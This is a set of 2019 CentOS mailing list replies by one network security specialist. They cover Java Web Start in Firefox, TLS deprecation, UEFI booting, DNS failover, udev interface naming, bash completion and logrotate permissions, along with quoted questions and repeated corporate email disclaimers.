What am I missing or not looking at that you security gurus are looking at?

I subscribe to the centos and SANS newsletters, and I try to keep
current on all technology with credible sources of articles online and
with the Lynda library.

What other sources of information do you use to stay current about the
latest threats and technology updates?

I appreciate the feedback.

Chris



___
CentOS mailing list
CentOS@centos.org
https://lists.centos.org/mailman/listinfo/centos

Harriscomputer

Leroy Tennison
Network Information/Cyber Security Specialist
E: le...@datavoiceint.com


[cid:Data-Voice-International-LOGO_aa3d1c6e-5cfb-451f-ba2c-af8059e69609.PNG]


2220 Bush Dr
McKinney, Texas
75070
www.datavoiceint.com<http://www..com>


This message has been sent on behalf of a company that is part of the Harris 
Operating Group of Constellation Software Inc.

If you prefer not to be contacted by Harris Operating Group please notify 
us<http://subscribe.harriscomputer.com/>.



This message is intended exclusively for the individual or entity to which it 
is addressed. This communication may contain information that is proprietary, 
privileged or confidential or otherwise legally exempt from disclosure. If you 
are not the named addressee, you are not authorized to read, print, retain, 
copy or disseminate this message or any part of it. If you have received this 
message in error, please notify the sender immediately by e-mail and delete all 
copies of the message.




___
CentOS mailing list
CentOS@centos.org
https://lists.centos.org/mailman/listinfo/centos

Re: [CentOS] Firefox 68 jnlp files

[Leroy Tennison]

Not knowing what kind of server management you're looking for I can only make 
general suggestions.  We found that the removal of Java support (actually NSAPI 
in favor of the Pepper API which Oracle has stated they won't support) left us 
with limited IPMI (iLO, DRAC, whatever) functionality.  And, looking at 
https://en.wikipedia.org/wiki/Java_Web_Start, Oracle has stopped supporting 
javaws.  In our case (SuperMicro) we found two things: their newer hardware had 
switched to HTML5/iKVM which didn't require Java and SuperMicro had supplied 
non-browser-based (but Java-based) programs which supplied equivalent 
functionality for the legacy hardware.  My recommendation would be to look into 
those alternatives.
Java Web Start - Wikipedia<https://en.wikipedia.org/wiki/Java_Web_Start>
In computing, Java Web Start (also known as JavaWS, javaws or JAWS) is a 
framework developed by Sun Microsystems (now Oracle) that allows users to start 
application software for the Java Platform directly from the Internet using a 
web browser.Some key benefits of this technology include seamless version 
updating for globally distributed applications and greater control of memory 
allocation to ...
en.wikipedia.org




From: CentOS  on behalf of isdtor 
Sent: Thursday, November 14, 2019 8:17 AM
To: centos@centos.org 
Subject: [EXTERNAL] Re: [CentOS] Firefox 68 jnlp files

isdtor writes:
> It seems that firefox 68.x, as distributed with CentOS6 updates, no longer 
> allows opening jnlp files with javaws
>
> The "Choose Helper Application" window popping up after selecting "Open 
> with/Other" has a predefined list of applications that cannot be customised.
>
> I'm sure it must be a configuration issue as this works fine with the same 
> browser on other distributions, but what to look for?
>
> # alternatives --display javaws
> javaws - status is auto.
>  link currently points to /usr/java/latest/jre/bin/javaws
> /usr/java/latest/jre/bin/javaws - priority 20
> Current `best' version is /usr/java/latest/jre/bin/javaws.
> # ll -L /etc/alternatives/javaws
> -rwxr-xr-x 1 root root 140296 Dec 15  2018 /etc/alternatives/javaws
> #

No replies, really? Lack of this facility makes browser and platform unusable 
for server management.

___
CentOS mailing list
CentOS@centos.org
https://lists.centos.org/mailman/listinfo/centos

Harriscomputer

Leroy Tennison
Network Information/Cyber Security Specialist
E: le...@datavoiceint.com


[cid:Data-Voice-International-LOGO_aa3d1c6e-5cfb-451f-ba2c-af8059e69609.PNG]


2220 Bush Dr
McKinney, Texas
75070
www.datavoiceint.com<http://www..com>


This message has been sent on behalf of a company that is part of the Harris 
Operating Group of Constellation Software Inc.

If you prefer not to be contacted by Harris Operating Group please notify 
us<http://subscribe.harriscomputer.com/>.



This message is intended exclusively for the individual or entity to which it 
is addressed. This communication may contain information that is proprietary, 
privileged or confidential or otherwise legally exempt from disclosure. If you 
are not the named addressee, you are not authorized to read, print, retain, 
copy or disseminate this message or any part of it. If you have received this 
message in error, please notify the sender immediately by e-mail and delete all 
copies of the message.




___
CentOS mailing list
CentOS@centos.org
https://lists.centos.org/mailman/listinfo/centos

Re: [CentOS] Limit user password by time

[Leroy Tennison]

chage apparently depends on the shadow file which is day-based.  You might want 
to be more specific when you say "limit", are you trying to force password 
changes every 2 hours or force logout every 2 hours or something else?  The 
reason I ask is you're probably into the "create your own method" arena where 
exactly what you're trying to do may greatly influence the possibilities.


From: CentOS  on behalf of Gestió Servidors 

Sent: Monday, November 4, 2019 3:28 AM
To: centos@centos.org 
Subject: [EXTERNAL] Re: [CentOS] Limit user password by time

Is it possible with "chage" to configure a password caducity for, at
most, 2 hours? I think "chage" only allows caducity for, at least, one day.
___
CentOS mailing list
CentOS@centos.org
https://lists.centos.org/mailman/listinfo/centos

Harriscomputer

Leroy Tennison
Network Information/Cyber Security Specialist
E: le...@datavoiceint.com


[cid:Data-Voice-International-LOGO_aa3d1c6e-5cfb-451f-ba2c-af8059e69609.PNG]


2220 Bush Dr
McKinney, Texas
75070
www.datavoiceint.com<http://www..com>


This message has been sent on behalf of a company that is part of the Harris 
Operating Group of Constellation Software Inc.

If you prefer not to be contacted by Harris Operating Group please notify 
us<http://subscribe.harriscomputer.com/>.



This message is intended exclusively for the individual or entity to which it 
is addressed. This communication may contain information that is proprietary, 
privileged or confidential or otherwise legally exempt from disclosure. If you 
are not the named addressee, you are not authorized to read, print, retain, 
copy or disseminate this message or any part of it. If you have received this 
message in error, please notify the sender immediately by e-mail and delete all 
copies of the message.




___
CentOS mailing list
CentOS@centos.org
https://lists.centos.org/mailman/listinfo/centos

Re: [CentOS] easy way to stop old ssl's

[Leroy Tennison]

Just saw the original message (Outlook Web Access isn't the greatest in 
presenting threads).  I had to do it manually but the number of settings to 
change was small (for a fairly simple website).  I would think a sed script 
inside a for loop would do for a system.  If you have a large number of systems 
then it's time to look at Puppet/Ansible/Chef.

From: CentOS  on behalf of Leroy Tennison 

Sent: Friday, October 11, 2019 11:48 PM
To: CentOS mailing list 
Subject: Re: [CentOS] easy way to stop old ssl's

Without context it's impossible to make firm statements but, having gone 
through this a while back (and discovering that less than 1 percent of an 
examined list of connections couldn't support current ssl - mainly Apple 
hardware), who do you want to protect?  Is it the minority who won't/can't 
upgrade or the majority who have?  And, do you have to protect yourself from 
liability (regulatory or contractual)?  If the environment is in any way 
sensitive (Personally Identifiable Information, Health data, Credit Card data) 
then the answer is obvious.

Harriscomputer

Register now for the dataVoice User Conference,
October 9-11 at the Gaylord Rockies in Denver, CO.
To register click Here<https://www.harriscomputer.com/en/events/>


Leroy Tennison
Network Information/Cyber Security Specialist
E: le...@datavoiceint.com


[cid:Data-Voice-International-LOGO_aa3d1c6e-5cfb-451f-ba2c-af8059e69609.PNG]


2220 Bush Dr
McKinney, Texas
75070
www.datavoiceint.com<http://www..com>


This message has been sent on behalf of a company that is part of the Harris 
Operating Group of Constellation Software Inc.

If you prefer not to be contacted by Harris Operating Group please notify 
us<http://subscribe.harriscomputer.com/>.



This message is intended exclusively for the individual or entity to which it 
is addressed. This communication may contain information that is proprietary, 
privileged or confidential or otherwise legally exempt from disclosure. If you 
are not the named addressee, you are not authorized to read, print, retain, 
copy or disseminate this message or any part of it. If you have received this 
message in error, please notify the sender immediately by e-mail and delete all 
copies of the message.






From: CentOS  on behalf of Warren Young 

Sent: Friday, October 11, 2019 3:58 PM
To: CentOS mailing list 
Subject: [EXTERNAL] Re: [CentOS] easy way to stop old ssl's


Harriscomputer

Register now for the dataVoice User Conference,
October 9-11 at the Gaylord Rockies in Denver, CO.
To register click 
Here<https://linkprotect.cudasvc.com/url?a=https%3a%2f%2fwww.harriscomputer.com%2fen%2fevents%2f=E,1,4J7-GGGBpU9KBPfPZ7bL730w7WiyJlctx6iIvi5PWH7ZM8lC_dVONfXLuYIqLeXHJdKEpUhep3pXkJ3H5aKy9zTmVcdXIuVUQwAE9dGXbSxuwQ8,=1>


Leroy Tennison
Network Information/Cyber Security Specialist
E: le...@datavoiceint.com


[cid:Data-Voice-International-LOGO_aa3d1c6e-5cfb-451f-ba2c-af8059e69609.PNG]


2220 Bush Dr
McKinney, Texas
75070
https://linkprotect.cudasvc.com/url?a=https%3a%2f%2fwww.datavoiceint.com=E,1,1CVIwFnqDNjeMobHyItdRlGR_7-a25a9csDCwUICadY6cNeNGWLIh7RYua2hi0wTgCsLyEWcZhDFXu0XIqOzIqg62dgI8l7698aRzx0KHSU6X2L5SVbV=1<http://www..com>


This message has been sent on behalf of a company that is part of the Harris 
Operating Group of Constellation Software Inc.

If you prefer not to be contacted by Harris Operating Group please notify 
us<https://linkprotect.cudasvc.com/url?a=http%3a%2f%2fsubscribe.harriscomputer.com%2f=E,1,5g3DWaevZ_6CRMR9DZ2NvFs6mv0LUL7Ceslt7x0pEY9xRa4IkwRngZxDYuKiPPTTL5ikJeKoHbPkB7LfS3v_n8-NYxZO_2Emr5Y89EPatHmO_a2MY-Ol3A,,=1>.



This message is intended exclusively for the individual or entity to which it 
is addressed. This communication may contain information that is proprietary, 
privileged or confidential or otherwise legally exempt from disclosure. If you 
are not the named addressee, you are not authorized to read, print, retain, 
copy or disseminate this message or any part of it. If you have received this 
message in error, please notify the sender immediately by e-mail and delete all 
copies of the message.





On Oct 11, 2019, at 2:52 PM, isdtor  wrote:
>
>> Yes, breaking changes.  Doing this *will* cut off support for older 
>> browsers.  On purpose.
>
> Old browsers aren't really the problem. Even ff 45 (?) from CentOS5 will 
> happily access a TLSv1.2-only server.

IE 10 and older won’t, though: 
https://linkprotect.cudasvc.com/url?a=https%3a%2f%2fcaniuse.com%2f%23feat%3dtls1-2=E,1,OoDXU9RwckHnPZSdyy1A-Mat1VYd83r6qJeujdFE_9jDKQp4hvmqnE9CbbcsCi5OsTOOx75sM1xfwvskBnYzTm7sNq1P3DnbfLyLhGR491ys6viVqTrf=1

> The problem is user that have old versions of software installed with no 
> TLSv1.2 support. SVN, python 2.7 scripts, etc.

Also true.  There’s a lot of stuff still linked to OpenSSL 1.0.0 and 0.98.
___
Cent

Re: [CentOS] easy way to stop old ssl's

[Leroy Tennison]

Without context it's impossible to make firm statements but, having gone 
through this a while back (and discovering that less than 1 percent of an 
examined list of connections couldn't support current ssl - mainly Apple 
hardware), who do you want to protect?  Is it the minority who won't/can't 
upgrade or the majority who have?  And, do you have to protect yourself from 
liability (regulatory or contractual)?  If the environment is in any way 
sensitive (Personally Identifiable Information, Health data, Credit Card data) 
then the answer is obvious.

From: CentOS  on behalf of Warren Young 

Sent: Friday, October 11, 2019 3:58 PM
To: CentOS mailing list 
Subject: [EXTERNAL] Re: [CentOS] easy way to stop old ssl's


Harriscomputer

Register now for the dataVoice User Conference,
October 9-11 at the Gaylord Rockies in Denver, CO.
To register click Here<https://www.harriscomputer.com/en/events/>


Leroy Tennison
Network Information/Cyber Security Specialist
E: le...@datavoiceint.com


[cid:Data-Voice-International-LOGO_aa3d1c6e-5cfb-451f-ba2c-af8059e69609.PNG]


2220 Bush Dr
McKinney, Texas
75070
www.datavoiceint.com<http://www..com>


This message has been sent on behalf of a company that is part of the Harris 
Operating Group of Constellation Software Inc.

If you prefer not to be contacted by Harris Operating Group please notify 
us<http://subscribe.harriscomputer.com/>.



This message is intended exclusively for the individual or entity to which it 
is addressed. This communication may contain information that is proprietary, 
privileged or confidential or otherwise legally exempt from disclosure. If you 
are not the named addressee, you are not authorized to read, print, retain, 
copy or disseminate this message or any part of it. If you have received this 
message in error, please notify the sender immediately by e-mail and delete all 
copies of the message.





On Oct 11, 2019, at 2:52 PM, isdtor  wrote:
>
>> Yes, breaking changes.  Doing this *will* cut off support for older 
>> browsers.  On purpose.
>
> Old browsers aren't really the problem. Even ff 45 (?) from CentOS5 will 
> happily access a TLSv1.2-only server.

IE 10 and older won’t, though: 
https://linkprotect.cudasvc.com/url?a=https%3a%2f%2fcaniuse.com%2f%23feat%3dtls1-2=E,1,OoDXU9RwckHnPZSdyy1A-Mat1VYd83r6qJeujdFE_9jDKQp4hvmqnE9CbbcsCi5OsTOOx75sM1xfwvskBnYzTm7sNq1P3DnbfLyLhGR491ys6viVqTrf=1

> The problem is user that have old versions of software installed with no 
> TLSv1.2 support. SVN, python 2.7 scripts, etc.

Also true.  There’s a lot of stuff still linked to OpenSSL 1.0.0 and 0.98.
___
CentOS mailing list
CentOS@centos.org
https://lists.centos.org/mailman/listinfo/centos
___
CentOS mailing list
CentOS@centos.org
https://lists.centos.org/mailman/listinfo/centos

Re: [CentOS] [EXTERNAL] UEFI booting

[Leroy Tennison]

My experience with UEFI is that it is a black art.  Fought with it until a 
deadline forced me to non-UEFI.  In my case a drive-based UEFI partition 
(FAT32) was required.  See if efibootmgr is available and would help you.  I 
should note that, in the process. I discovered that the UEFI standard makes no 
provision for RAID if it is disk-based.  I would love to hear someone 
contradict me on that and point me to documentation on how to do it without 
resorting to exotic maneuvers.

From: CentOS  on behalf of Jerry Geis 

Sent: Thursday, September 19, 2019 6:42 AM
To: CentOS mailing list 
Subject: [EXTERNAL] [CentOS] UEFI booting

I installed my first UEFI disk yesterday. Seemed to go fine. CentOS 7.6
x86_64
I then took that disk "out" of that machine and put it another machine - it
seems to not even boot.
I put the original disk back in that machine and it boots fine.

I put the UEFI disk back in the machine I built it on and it works fine.
They are similar machines either and i3 and i7.

Shouldn't that work?  Build a UEFI disk on machine A - move it to machine B?

Thanks

Jerry
___
CentOS mailing list
CentOS@centos.org
https://lists.centos.org/mailman/listinfo/centos
___
CentOS mailing list
CentOS@centos.org
https://lists.centos.org/mailman/listinfo/centos

Re: [CentOS] how to increase DNS reliability?

[Leroy Tennison]

This brings up one of the caveats for (at least ISC) DNS, if the master goes 
down the slaves will take over for a time but eventually will stop serving for 
the domains of the master if it remains down too long.  If my (sometimes 
faulty) memory serves me well it is in the three day range (but configurable) 
which is ample time unless the problem occurs early in a holiday weekend and 
and the notification/escalation process isn't what it should be (Murphey's 
Law)...


From: CentOS  on behalf of Nataraj 

Sent: Thursday, July 25, 2019 6:31:26 PM
To: centos@centos.org 

Harriscomputer

Register now for the dataVoice User Conference,
October 9-11 at the Gaylord Rockies in Denver, CO.
To register click Here<https://www.harriscomputer.com/en/events/>


Leroy Tennison
Network Information/Cyber Security Specialist
E: le...@datavoiceint.com


[cid:Data-Voice-International-LOGO_aa3d1c6e-5cfb-451f-ba2c-af8059e69609.PNG]


2220 Bush Dr
McKinney, Texas
75070
www.datavoiceint.com<http://www..com>


This message has been sent on behalf of a company that is part of the Harris 
Operating Group of Constellation Software Inc. These companies are listed 
here<http://subscribe.harriscomputer.com/>.

If you prefer not to be contacted by Harris Operating Group please notify 
us<http://subscribe.harriscomputer.com/>.



This message is intended exclusively for the individual or entity to which it 
is addressed. This communication may contain information that is proprietary, 
privileged or confidential or otherwise legally exempt from disclosure. If you 
are not the named addressee, you are not authorized to read, print, retain, 
copy or disseminate this message or any part of it. If you have received this 
message in error, please notify the sender immediately by e-mail and delete all 
copies of the message.





Subject: [EXTERNAL] Re: [CentOS] how to increase DNS reliability?

On 7/25/19 1:10 PM, hw wrote:
>>
>> Configure all dns servers as primary slaves (plus 1 primary master) for
>> your own domains.  I have never seen problems with resolution of local
>> dns domains when the Internet was down.
>
> It seemed to have to do with the TTL for the local names being too
> short and DNS being designed to generally query root servers rather
> than sticking to their local information.


It has nothing to do with the ttl. The TTL does cause expiration in an
authoritative server.  TTLs only affect  caching servers.  The primary
master gets changed when you edit the local zone database.  The
secondary slave gets updated when the serial number in the SOA record on
the primary master gets bumped.   You must either do that manually or
use a zone database management tool that does it for you.

If a dns server is configured as a primary master or a secondary slave
for a domain, then it is authoritative for that domain and does not
require queries to any other server on your network or on the Internet.
The difference between a primary master and a secondary slave is the
primary master is where you edit the zone records and the secondary
slave replicates the zone database from the primary master.  Even if the
primary master goes down, the secondary slave still has a copy of the
zone files in it's disk files (or other database format that you
configure) and will server them flawlessly.

One way to see if a server is properly configured as authoritative for a
domain is:

nataraj@pygeum:~$ dig mydomain.com. soa @127.0.0.1

; <<>> DiG 9.11.3-1ubuntu1.8-Ubuntu <<>> mydomain.com. soa@127.0.0.1
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 52104
;; flags: qr *aa* rd ra; QUERY: 1, ANSWER: 1, AUTHORITY: 3, ADDITIONAL: 4

;; OPT PSEUDOSECTION:
; EDNS: version: 0, flags:; udp: 4096
; COOKIE: 64f402c0c22d57aa2bbb10fc5d3a340d8c19377b924d01c2 (good)
;; QUESTION SECTION:
;mydomain.com.INSOA

;; ANSWER SECTION:
Mydomain.Com.14400INSOAns1.mydomain.com.
postmaster.Mydomain.COM. 2019072505 1200 600 15552000 14400

;; AUTHORITY SECTION:
Mydomain.Com.14400INNSns1.Mydomain.Com.
Mydomain.Com.14400INNSns2.Mydomain.Com.
Mydomain.Com.14400INNSns3.Mydomain.com.

;; ADDITIONAL SECTION:
ns1.mydomain.com.14400INA8.8.8.8

;; Query time: 1 msec
;; SERVER: 127.0.0.1#53(127.0.0.1)
;; WHEN: Thu Jul 25 15:58:21 PDT 2019
;; MSG SIZE  rcvd: 243

The AA flag in the flags section tells you that you have queried a dns
server that is authoritative for the domain that you queried.  If it
doesn't have the AA flag then you have not properly set up the primary
master or secondary slave for that domain.

If your masters and slaves are all configured correctly for a domain
then they will all have the same serial number  in the SOA record (and
same results for any query in that domain).  If they d

[CentOS] how to increase DNS reliability?

[Leroy Tennison]

If you don't want multiple DNS server entries on the client then a master and 
(possibly multiple) slave server configuration can be set up (I'm assuming ISC 
DNS - their solution to redundancy/failover is master and slave servers, this 
may be the way it is with all DNS).  keepalived can be used for fail over and 
will present a single IP address (which the clients would use) shared among the 
servers.  haproxy or alternatives might be another fail over option.  Each 
technology has its own learning curve (and doing this will require at least 
two) and caveats.  In particular systemd doesn't appear to play well with 
technologies creating IP addresses it doesn't manage.  The version of 
keepalived we're using also has its own nasty quirk as well where it comes up 
assuming it is master until discovered otherwise, this is true even if it is 
configured as backup.  In most cases this is probably either a non-issue (no 
scripts being used) or a minor annoyance.  But if you're using scripts trigger
 ed by keepalived which make significant (and possibly conflicting) changes to 
the environment then you'll need to embed "intelligence" in them to wait until 
final state is reached or test state before acting or some other option.


From: CentOS  on behalf of hw 
Sent: Thursday, July 25, 2019 7:51:39 AM
To: centos@centos.org 
Subject: [EXTERNAL] [CentOS] how to increase DNS reliability?


Hi,

how can DNS reliability, as experienced by clients on the LAN who are
sending queries, be increased?

Would I have to set up some sort of cluster consisting of several
servers all providing DNS services which is reachable under a single
IP address known to the clients?

Just setting up several name servers and making them known to the clients
for the clients to automatically switch isn't a good solution because
the clients take their timeouts and users lacking even the most basic
knowledge inevitably panic when the first name server does not answer
queries.
___
CentOS mailing list
CentOS@centos.org
https://lists.centos.org/mailman/listinfo/centos

Harriscomputer

Register now for the dataVoice User Conference,
October 9-11 at the Gaylord Rockies in Denver, CO.
To register click Here<https://www.harriscomputer.com/en/events/>


Leroy Tennison
Network Information/Cyber Security Specialist
E: le...@datavoiceint.com


[cid:Data-Voice-International-LOGO_aa3d1c6e-5cfb-451f-ba2c-af8059e69609.PNG]


2220 Bush Dr
McKinney, Texas
75070
www.datavoiceint.com<http://www..com>


This message has been sent on behalf of a company that is part of the Harris 
Operating Group of Constellation Software Inc. These companies are listed 
here<http://subscribe.harriscomputer.com/>.

If you prefer not to be contacted by Harris Operating Group please notify 
us<http://subscribe.harriscomputer.com/>.



This message is intended exclusively for the individual or entity to which it 
is addressed. This communication may contain information that is proprietary, 
privileged or confidential or otherwise legally exempt from disclosure. If you 
are not the named addressee, you are not authorized to read, print, retain, 
copy or disseminate this message or any part of it. If you have received this 
message in error, please notify the sender immediately by e-mail and delete all 
copies of the message.




___
CentOS mailing list
CentOS@centos.org
https://lists.centos.org/mailman/listinfo/centos

[CentOS] How to restore the old network interface name?

[Leroy Tennison]

Might look into 70-persistent-net.rules in addition to the article below (do 
your web research for that and CentOS 7), it's a file you probably have to 
create (not necessarily auto-generated as some documentation says) under 
/etc/udev/rules.d.  There have been two known formats for that file and a given 
format doesn't work in all cases.  Here are the formats I've seen, hope it 
helps (everything below is literal except what's contained in the less/greater 
than delimiters):

SUBSYSTEM=="net", ACTION=="add", DRIVERS=="?*", 
ATTR{address}=="", 
ATTR{dev_id}=="0x0", ATTR{type}=="1", KERNEL=="eth*", NAME=""

SUBSYSTEM=="net", ACTION=="add", DRIVERS=="?*", 
ATTR{address}=="", 
ATTR{dev_id}=="0x0", ATTR{type}=="1", NAME=""

Note the missing KERNEL==... in the latter form.

From: CentOS  on behalf of Ralf Prengel 

Sent: Tuesday, July 2, 2019 4:56 AM
To: CentOS mailing list
Subject: [EXTERNAL] [CentOS] How to restore the old network interface name?

Hallo,

I need the device eth0 for one tool using centos 7.6.
Using this tutorial
https://linkprotect.cudasvc.com/url?a=https%3a%2f%2fwww.certdepot.net%2frhel7-restore-old-network-interface-name%2f=E,1,_N-6Ga7-RXX-iwhg9-7842nyxrBXlZ3jmvPHUhIYBoIRbfi51krljOSNJKWZlazwotUW4gPX0NsSZ6l6Sjdtdaba3SAt1YES6sfHIll53M2YxmPjTrrb98aASA,,=1
doesn t work.

Thanks for a hint.

Ralf

_______
CentOS mailing list
CentOS@centos.org
https://lists.centos.org/mailman/listinfo/centos

Harriscomputer

Leroy Tennison
Network Information/Cyber Security Specialist
E: le...@datavoiceint.com


[cid:Data-Voice-International-LOGO_aa3d1c6e-5cfb-451f-ba2c-af8059e69609.PNG]


2220 Bush Dr
McKinney, Texas
75070
www.datavoiceint.com<http://www..com>


This message has been sent on behalf of a company that is part of the Harris 
Operating Group of Constellation Software Inc. These companies are listed 
here<http://subscribe.harriscomputer.com/>.

If you prefer not to be contacted by Harris Operating Group please notify 
us<http://subscribe.harriscomputer.com/>.



This message is intended exclusively for the individual or entity to which it 
is addressed. This communication may contain information that is proprietary, 
privileged or confidential or otherwise legally exempt from disclosure. If you 
are not the named addressee, you are not authorized to read, print, retain, 
copy or disseminate this message or any part of it. If you have received this 
message in error, please notify the sender immediately by e-mail and delete all 
copies of the message.




___
CentOS mailing list
CentOS@centos.org
https://lists.centos.org/mailman/listinfo/centos

[CentOS] Bash completion thrown by quoted option args?

[Leroy Tennison]

I am going to take a really wild guess and say "Try replacing the outermost 
quotes with single quotes or escape the double quotes around the numeral 1".  
Your second example has double quotes within double quotes and I'm wondering if 
that's getting rendered as "yum --debuglevel="  1  " install ..." 
(extra space added for emphasis).


From: CentOS  on behalf of isdtor 
Sent: Thursday, May 23, 2019 9:47:20 AM
To: CentOS mailing list
Subject: [EXTERNAL] [CentOS] Bash completion thrown by quoted option args?

There was a thread about C7 bash completion back in August last year, but it 
doesn't have answers for this problem.

Example: "yum install /path/to/local/package" works fine with tab completion to 
fill in the path and package bits.

However, "yum --debuglevel="1" install ..." just gets stuck and doesn't offer 
anything. The only option is to type everything out, or type enough to use a 
wildcard. After more testing, I found that any option argument that is quoted 
breaks completion. Which in turn makes me think this is not even specific to 
yum but bash completion in general.

Bug? Upstream bug?

___
CentOS mailing list
CentOS@centos.org
https://lists.centos.org/mailman/listinfo/centos

Harriscomputer

Leroy Tennison
Network Information/Cyber Security Specialist
E: le...@datavoiceint.com


[cid:Data-Voice-International-LOGO_aa3d1c6e-5cfb-451f-ba2c-af8059e69609.PNG]


2220 Bush Dr
McKinney, Texas
75070
www.datavoiceint.com<http://www..com>


This message has been sent on behalf of a company that is part of the Harris 
Operating Group of Constellation Software Inc. These companies are listed 
here<http://subscribe.harriscomputer.com/>.

If you prefer not to be contacted by Harris Operating Group please notify 
us<http://subscribe.harriscomputer.com/>.



This message is intended exclusively for the individual or entity to which it 
is addressed. This communication may contain information that is proprietary, 
privileged or confidential or otherwise legally exempt from disclosure. If you 
are not the named addressee, you are not authorized to read, print, retain, 
copy or disseminate this message or any part of it. If you have received this 
message in error, please notify the sender immediately by e-mail and delete all 
copies of the message.




___
CentOS mailing list
CentOS@centos.org
https://lists.centos.org/mailman/listinfo/centos

Re: [CentOS] Opera browser on CentOS

[Leroy Tennison]

Although not on CentOS, I have run Opera for some time as a result of my 
dislike of some of the politics elsewhere.  It has some unique features but I 
have not found it to be as compatible as Firefox, there are situations where it 
does not work and Firefox does.  Unfortunately I haven't gone to the effort to 
categorize those experiences, they aren't too frequent.


From: CentOS  on behalf of Greg Bailey 

Sent: Monday, May 20, 2019 8:35:40 AM
To: centos@centos.org

Harriscomputer

Leroy Tennison
Network Information/Cyber Security Specialist
E: le...@datavoiceint.com


[cid:Data-Voice-International-LOGO_aa3d1c6e-5cfb-451f-ba2c-af8059e69609.PNG]


2220 Bush Dr
McKinney, Texas
75070
www.datavoiceint.com<http://www..com>


This message has been sent on behalf of a company that is part of the Harris 
Operating Group of Constellation Software Inc. These companies are listed 
here<http://subscribe.harriscomputer.com/>.

If you prefer not to be contacted by Harris Operating Group please notify 
us<http://subscribe.harriscomputer.com/>.



This message is intended exclusively for the individual or entity to which it 
is addressed. This communication may contain information that is proprietary, 
privileged or confidential or otherwise legally exempt from disclosure. If you 
are not the named addressee, you are not authorized to read, print, retain, 
copy or disseminate this message or any part of it. If you have received this 
message in error, please notify the sender immediately by e-mail and delete all 
copies of the message.





Subject: [EXTERNAL] Re: [CentOS] Opera browser on CentOS

On 5/20/19 6:22 AM, H wrote:
> Is anyone running the Opera browser on Centos 7 or 6? While not available in 
> a yum-repository, it seems to be available as a snap-package. Not familiar 
> with those yet but curious if the browser is worthwhile to run. I have 
> generally found Firefox less useful/compatible than Chromium but would also 
> like alternatives, particularly since Opera defaults to a VPN-connection.
>
>

It is available in opera's yum repository:

[opera]
name=Opera packages
type=rpm-md
baseurl=https://rpm.opera.com/rpm
gpgcheck=1
gpgkey=https://rpm.opera.com/rpmrepo.key
enabled=1

I only run it very occasionally, in cases where I want a second login
session to AWS that's different from my primary Firefox session, etc.

-Greg

___
CentOS mailing list
CentOS@centos.org
https://lists.centos.org/mailman/listinfo/centos
___
CentOS mailing list
CentOS@centos.org
https://lists.centos.org/mailman/listinfo/centos

Re: [CentOS] Are linux distros redundant?

[Leroy Tennison]

Another point is that Ubuntu is not just a Fedora alternative, they have a 
long-term support option known as LTS - all the even numbered releases: 14.04 
(at EOL), 16.04, 18.04 (latest).  I have heard that for 18.04 forward, they are 
going to a 10-year support model.  For a Fedora alternative the odd-numbered 
releases should be used.


From: CentOS  on behalf of Andrew Holway 

Sent: Wednesday, April 24, 2019 12:08:14 PM
To: Simon Matter; centos
Subject: [EXTERNAL] Re: [CentOS] Are linux distros redundant?

> Maybe you should try to explain to your manager why RHEL/CentOS exist and
> why it's widely used in the corporate world. If he talks about Ubuntu then
> you could explain to him what Fedora is any why and how it differs from
> RHEL/CentOS.
>

I'm not really sure that the reasons for Rhel really exist anymore. The oft
quoted Library stabilty is more of a hindrance than a help in modern
development environments with well operating CI.

When the dinosaur IBM bought RH it was clear that it had become a fossil.

Of course there is still legacy applications that need that but I see a
definite shift away from OS dependant monoliths even in the more
traditional enterprises

>
>
___
CentOS mailing list
CentOS@centos.org
https://lists.centos.org/mailman/listinfo/centos

Harriscomputer

Leroy Tennison
Network Information/Cyber Security Specialist
E: le...@datavoiceint.com


[cid:Data-Voice-International-LOGO_aa3d1c6e-5cfb-451f-ba2c-af8059e69609.PNG]


2220 Bush Dr
McKinney, Texas
75070
www.datavoiceint.com<http://www..com>


This message has been sent on behalf of a company that is part of the Harris 
Operating Group of Constellation Software Inc. These companies are listed 
here<http://subscribe.harriscomputer.com/>.

If you prefer not to be contacted by Harris Operating Group please notify 
us<http://subscribe.harriscomputer.com/>.



This message is intended exclusively for the individual or entity to which it 
is addressed. This communication may contain information that is proprietary, 
privileged or confidential or otherwise legally exempt from disclosure. If you 
are not the named addressee, you are not authorized to read, print, retain, 
copy or disseminate this message or any part of it. If you have received this 
message in error, please notify the sender immediately by e-mail and delete all 
copies of the message.




___
CentOS mailing list
CentOS@centos.org
https://lists.centos.org/mailman/listinfo/centos

[CentOS] read permission on rotated logs

[Leroy Tennison]

Maybe I'm missing something here but doesn't logrotate have the 'postrotate ... 
endscript' block for its configuration files where you can run any command you 
desire?


Leroy Tennison
Network Information/Cyber Security Specialist
E: le...@datavoiceint.com
2220 Bush Dr
McKinney, Texas
75070
www.datavoiceint.com
This message has been sent on behalf
of a company that is part of the Harris Operating Group of
Constellation Software Inc. These companies are listed
here
.
If you prefer not to be contacted by Harris
Operating Group
please notify us
.
This message is intended exclusively for the
individual or entity to which it is addressed. This communication
may contain information that is proprietary, privileged or
confidential or otherwise legally exempt from disclosure. If you are
not the named addressee, you are not authorized to read, print,
retain, copy or disseminate this message or any part of it. If you
have received this message in error, please notify the sender
immediately by e-mail and delete all copies of the
message.


From: CentOS  on behalf of Alice Wonder 

Sent: Wednesday, March 13, 2019 5:13 PM
To: centos@centos.org
Subject: [EXTERNAL] [CentOS] read permission on rotated logs

When logs (e.g. /var/log/maillog) are rotated (e.g. to
/var/log/maillog-MDD) is there a way via systemd or whatever to
assign read permission to a specific group?

Right now, for example -

ls -l maillog*
-rw--- 1 root root 3105240 Mar 13 22:04 maillog
-rw--- 1 root root 1079031 Feb 24 04:39 maillog-20190224
-rw--- 1 root root 7237640 Mar  1 12:59 maillog-20190228
-rw--- 1 root root 1297508 Mar  3 04:21 maillog-20190303
-rw--- 1 root root 1319371 Mar 10 08:17 maillog-20190310

What I would like -

ls -l maillog*
-rw--- 1 root root 3105240 Mar 13 22:04 maillog
-rw-r- 1 root somegroup 1079031 Feb 24 04:39 maillog-20190224
-rw-r- 1 root somegroup 7237640 Mar  1 12:59 maillog-20190228
-rw-r- 1 root somegroup 1297508 Mar  3 04:21 maillog-20190303
-rw-r- 1 root somegroup 1319371 Mar 10 08:17 maillog-20190310

That way a user in somegroup could run a script that analyzes the
rotated logs w/o needing root privileges.

Obviously I could put a script in /etc/cron.hourly that looks for
rotated log files and changes ownership / permission, but I am wondering
if there is a "proper" way to configure it via systemd or another utility.
___
CentOS mailing list
CentOS@centos.org
